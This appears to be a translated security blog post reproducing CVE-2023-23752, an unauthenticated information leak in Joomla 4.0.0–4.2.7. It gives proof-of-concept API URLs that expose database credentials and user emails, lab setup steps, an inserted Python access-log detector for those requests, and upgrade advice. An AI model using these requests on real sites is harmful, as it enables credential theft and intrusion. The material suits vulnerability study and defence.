[Vulnerability Express | EXP attached] CVE-2023-23752 Reproduction
2023-2-22 21:18:58 Author: 渗透安全团队

0x01 Introduction

Joomla is a globally known content management system (CMS), developed in PHP on top of a MySQL database, that runs on Linux, Windows, macOS and other platforms.

On 16 February, Joomla published a security advisory fixing an unauthorized access vulnerability (CVE-2023-23752) in Joomla! CMS; the details and a PoC/EXP are now public.
In Joomla! CMS versions 4.0.0 through 4.2.7, improper access restrictions on web service endpoints allow unauthenticated access to the REST API, which can leak sensitive information such as the database username and password. Given the impact, affected users are advised to check their deployments and apply protections as soon as possible.

0x02 Affected versions

Affected versions:   4.0.0 <= Joomla <= 4.2.7
Unaffected versions: Joomla >= 4.2.8
Joomla 3 and earlier are not affected by this vulnerability.

0x03 Environment setup

Set up directly with phpstudy or wamp.

After downloading and extracting, place it under wamp/www/Joomla or phpstudy/PHPTutorial/WWW/Joomla/.

Visit http://127.0.0.1/Joomla/ to start the installation.

Login data configuration

Database configuration details

Installation complete

Environment set up successfully

0x04 Vulnerability reproduction

PoC:

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/config/application?public=true

This API returns the site's most important configuration, including the database username and password.

Retrieving the site's user names and e-mail addresses:

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/users?public=true
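The two requests above leave a clear trace in the web server access log. The following detector, an added example that is not part of the original post, flags unauthenticated `public=true` reads of the v1 API, rates a 200 on `config/application` or `users` as high severity, and treats a 401 (what a patched site returns) as informational. The log lines, IPs and route table are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Feb/2023:21:10:01 +0800] "GET /Joomla4.2.7/api/index.php/v1/config/application?public=true HTTP/1.1" 200 1843 "-" "curl/7.81.0"',
    '203.0.113.5 - - [22/Feb/2023:21:10:03 +0800] "GET /Joomla4.2.7/api/index.php/v1/users?public=true HTTP/1.1" 200 912 "-" "curl/7.81.0"',
    '198.51.100.7 - - [22/Feb/2023:21:11:40 +0800] "GET /Joomla4.2.7/index.php/component/users/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Feb/2023:21:12:02 +0800] "GET /Joomla4.2.7/api/index.php/v1/config/application?public=true HTTP/1.1" 401 120 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Routes the post singles out: site config (DB credentials) and user accounts.
SENSITIVE_ROUTES = {"config/application": "site config incl. DB credentials",
                    "users": "user names and e-mail addresses"}

def classify(line):
    """Return a finding dict for a Joomla v1 API request, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    marker = "/api/index.php/v1/"
    idx = url.path.find(marker)
    if idx < 0:
        return None
    route = url.path[idx + len(marker):].strip("/")
    public = parse_qs(url.query).get("public", [""])[0].lower() == "true"
    status = int(m.group("status"))
    if public and route in SENSITIVE_ROUTES and status == 200:
        severity = "high"      # unauthenticated read succeeded: the site is exposed
    elif public and status == 200:
        severity = "medium"    # other v1 data read without authentication
    else:
        severity = "info"      # rejected (e.g. 401 on a patched 4.2.8 site) or routine
    return {"ip": m.group("ip"), "ts": m.group("ts"), "route": route,
            "public": public, "status": status, "severity": severity,
            "exposes": SENSITIVE_ROUTES.get(route)}

def scan(lines):
    """Return findings for all lines, highest severity first."""
    order = {"high": 0, "medium": 1, "info": 2}
    found = [f for f in (classify(l) for l in lines) if f]
    return sorted(found, key=lambda f: order[f["severity"]])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']:<6}] {f['ip']} {f['route']} public={f['public']} status={f['status']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a high finding means the unauthenticated read succeeded and the exposed database credentials should be rotated after upgrading.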


Other affected API endpoints are as follows:


0x05 Remediation

Joomla has released a fixed version; affected users are advised to upgrade promptly: https://downloads.joomla.org/

0x06 References

https://xz.aliyun.com/t/12175

Article source: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247498450&idx=2&sn=efe74dbe584ee2bec97c344fd9d6dbcc&chksm=c176077df6018e6b348ef603891f3e36099978f3154666aeebc3bb5c6731b3dfc5476e0524f6#rd